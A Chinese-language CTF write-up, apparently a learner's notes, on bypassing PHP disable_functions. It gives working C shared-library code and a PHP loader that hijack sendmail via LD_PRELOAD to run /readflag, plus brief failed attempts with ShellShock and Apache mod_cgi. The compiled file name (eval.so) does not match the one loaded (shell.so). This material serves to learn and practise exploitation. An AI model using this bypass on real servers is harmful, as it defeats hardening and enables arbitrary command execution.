一,LD_PRELOAD
前置知识:
putenv:php函数,可以设置环境变量
mail(),error_log(): php的函数,会调用系统的sendmail函数发送邮件
LD_PRELOAD:linux环境变量,作用是他设置的.so会在程序本身的.so之前执行。
题目情况
存在一个shell,用蚂剑直接连接。进入虚拟终端执行命令发现ret=127,说明不能执行系统命令
/?ant=phpinfo();看到禁用了很多函数
但是没有禁用putenv,error_log,email这几个函数
思路
创建一个shell.so文件,然后再创建一个个shell.php文件,再shell.php中设置环境变量加载shell.so,然后运行error_log函数,这两个函数会调用系统的.so,但是我们的shell.so会先加载,这个shell.so就会执行恶意代码。
实现
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
__attribute__ ((__constructor__)) void hausa_zui_shuai(void)
{
unsetenv("LD_PRELOAD");
system("echo any_other_eval_code");
system("/readflag > /tmp/hausa.txt");
}
attribute ((constructor))这个参数,可以读一下参考博文,它使得被自己修饰的函数在main函数前执行。 然后在本地Linux虚拟机上运行gcc -shared -fPIC hack.c -o
eval.so将这个源文件编译成动态链接库文件,并将其上传到服务器的/tmp目录下。
<?Php
putenv("LD_PRELOAD=/tmp/shell.so");
error_log("",1,"","");
?>
把这个shell.php上传到目标服务器的根目录,然后访问他,再去访问/tmp/hausa.txt就可以得到flag
劫持系统函数:
一,重写要被调用的方法(复现失败。。)
创建共享库A重写C方法,
php函数创建新进程,新进程调用系统函数,系统函数调用共享库B中的C方法,设置环境变量让A库优先级高于B库,执行php函数
#include <stdlib.h>
#include <stdio.h>
void payload() {
system("/readflag > /tmp/flag");
}
int getuid(){
if(getenv("LD_PRELOAD") == NULL) return 0;
unsetenv("LD_PRELOAD");
payload();
}
二,利用__attribute__ 使得被修饰的函数在main()之前执行
php函数创建新进程,新进程调用系统函数,系统函数调用共享库B中的C方法,设置环境变量让A库优先级高于B库,执行php函数
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
__attribute__ ((__constructor__)) void xxx (void){
unsetenv("LD_PRELOAD");
system("/readflag > /tmp/flag");
}
参考文章:https://blog.csdn.net/qq_42851946/article/details/106248177
二,ShellShock
webshell连不上去。。
三,Apache Mod CGI
这道题好像有问题,这个为空的话就导致不能够重载.htaccess文件了
这个系列的题真是太硬了。。感觉已经超出了基础漏洞的难度,为了绕过往往要结合多个方面的知识。。。现在还太菜了,等以后再来做吧。。